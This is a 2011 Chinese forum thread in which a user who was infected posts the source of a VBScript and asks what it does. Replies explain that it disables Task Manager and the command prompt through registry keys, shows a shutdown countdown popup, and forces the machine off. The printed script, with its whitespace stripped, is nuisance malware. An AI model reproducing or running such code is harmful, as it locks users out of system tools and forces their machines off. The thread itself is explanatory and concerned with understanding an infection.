中了这个了,源代码在此,不知有何用?

[复制链接]
查看11 | 回复3 | 2011-8-24 09:02:49 | 显示全部楼层 |阅读模式
sets=createobject(\"wscript.shell\")setbag=getobject(\"winmgmts:\\\\.\\root\\cimv2\")setpipe=bag.execquery(\"select*fromwin32_processwherename=\'wscript.exe\'\")ForEachidinpipeifinstr(1,id.commandLine,wscript.scriptfullname)0andpipe.count=2thens.regwrite\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr\",0,\"REG_DWORD\"s.regwrite\"HKCU\\Software\\Policies\\Microsoft\\Windows\\System\\DisableCMD\",0,\"REG_DWORD\"id.terminate()elses.regwrite\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr\",1,\"REG_DWORD\"s.regwrite\"HKCU\\Software\\Policies\\Microsoft\\Windows\\System\\DisableCMD\",1,\"REG_DWORD\"fori=1to1800s.popup\"系统将在\"defds1231800-idefds123\"秒后关机...\",1,\"系统提示\",409648nextSetcolOS=GetObject(\"winmgmts:{(Shutdown)}\").ExecQuery(\"Select*FROMWin32_OperatingSystem\")ForEacheOsIncolOSeOs.Win32Shutdown(2)NextendifNext啥后果。
回复

使用道具 举报

千问 | 2011-8-24 09:02:49 | 显示全部楼层
上面是一段脚本代码,初步分析应该是通过修改注册表相关键值的方式废止了用户的任务管理器,DOS命令提示符方式,然后弹出强制关机界面关机。追问1800什么的?没影响吗
回复

使用道具 举报

千问 | 2011-8-24 09:02:49 | 显示全部楼层
fori=1to1800s.popup\"系统将在\"defds1231800-idefds123\"秒后关机...\",1,\"系统提示\",409648next这段脚步运行应该是会不断的循环弹出提示窗口,直到循环体完成为止。
回复

使用道具 举报

千问 | 2011-8-24 09:02:49 | 显示全部楼层
电脑会自动关机
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

主题

0

回帖

4882万

积分

论坛元老

Rank: 8Rank: 8

积分
48824836
热门排行